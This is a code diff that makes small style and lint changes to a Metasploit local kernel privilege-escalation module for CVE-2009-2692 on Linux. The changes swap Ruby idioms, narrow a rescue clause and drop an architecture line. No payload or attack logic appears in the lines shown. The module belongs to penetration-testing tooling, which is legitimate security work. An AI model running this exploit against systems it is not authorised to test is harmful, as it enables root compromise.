@@ -52,7 +52,6 @@ class MetasploitModule < Msf::Exploit::Local
           'AKA' => ['EXACTCHANGE']
         },
         'Platform' => [ 'linux' ],
-        'Arch' => [ ARCH_X86 ],
         'SessionTypes' => [ 'shell', 'meterpreter' ],
         'References' => [
           [ 'CVE', '2009-2692' ],
@@ -145,12 +144,12 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     sc = Metasm::ELF.new @cpu
-    sc.parse %Q|
+    sc.parse %(
       #ifdef __ELF__
         .section ".bss" rwx
         .section ".text" rwx
       #endif
-    |
+    )
     current_task_struct_h sc
 
     if datastore['DEBUG_EXPLOIT']
@@ -494,13 +493,13 @@ int main(int argc, char **argv) {
     sc.c_set_default_entrypoint
 
     begin
-      if sc.kind_of? Metasm::ELF
+      if sc.is_a? Metasm::ELF
         elf = sc.encode_string
       else
         foo = sc.encode_string
         elf = Msf::Util::EXE.to_linux_x86_elf framework, foo
       end
-    rescue
+    rescue StandardError
       print_error "Metasm Encoding failed: #{$!}"
       elog "Metasm Encoding failed: #{$!.class} : #{$!}"
       elog "Call stack:\n#{$!.backtrace.join("\n")}"
